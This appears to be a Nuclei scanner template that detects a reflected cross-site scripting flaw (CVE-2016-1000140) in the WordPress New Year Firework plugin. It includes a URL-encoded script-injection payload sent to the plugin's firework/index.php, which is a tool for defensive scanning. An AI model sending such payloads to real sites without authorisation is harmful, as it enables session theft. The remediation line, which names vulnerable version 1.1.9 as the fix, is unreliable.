id: CVE-2016-1000140 info: name: WordPress New Year Firework <=1.1.9 - Cross-Site Scripting author: daffainfo severity: medium description: WordPress New Year Firework 1.1.9 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. impact: | Successful exploitation of this vulnerability could lead to cross-site scripting (XSS) attacks, allowing an attacker to execute malicious scripts on the victim's browser. remediation: | Update to the latest version of the WordPress New Year Firework plugin (1.1.9) to mitigate this vulnerability. reference: - http://www.vapidlabs.com/wp/wp_advisory.php?v=453 - https://wordpress.org/plugins/new-year-firework - https://nvd.nist.gov/vuln/detail/CVE-2016-1000140 - https://github.com/ARPSyndicate/cvemon - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-1000140 cwe-id: CWE-79 epss-score: 0.00119 epss-percentile: 0.45851 cpe: cpe:2.3:a:new-year-firework_project:new-year-firework:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 vendor: new-year-firework_project product: new-year-firework framework: wordpress tags: cve2016,cve,wordpress,xss,wp-plugin,new-year-firework_project flow: http(1) && http(2) http: - raw: - | GET /wp-content/plugins/new-year-firework/readme.txt HTTP/1.1 Host: {{Hostname}} matchers: - type: word internal: true words: - 'New Year Firework =' - method: GET path: - "{{BaseURL}}/wp-content/plugins/new-year-firework/firework/index.php?text=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word part: body words: - "" - type: word part: header words: - text/html - type: status status: - 200 # digest: 490a004630440220522b8d1268fc27200f3edb6ad9277377dbf2941cf980dce8e440fb4520257a7c0220650d2c599689ac4226a6d3839440c8d4991a99d77b01e3b77f968df17206624d:922c64590222798bb761d5b6d8e72950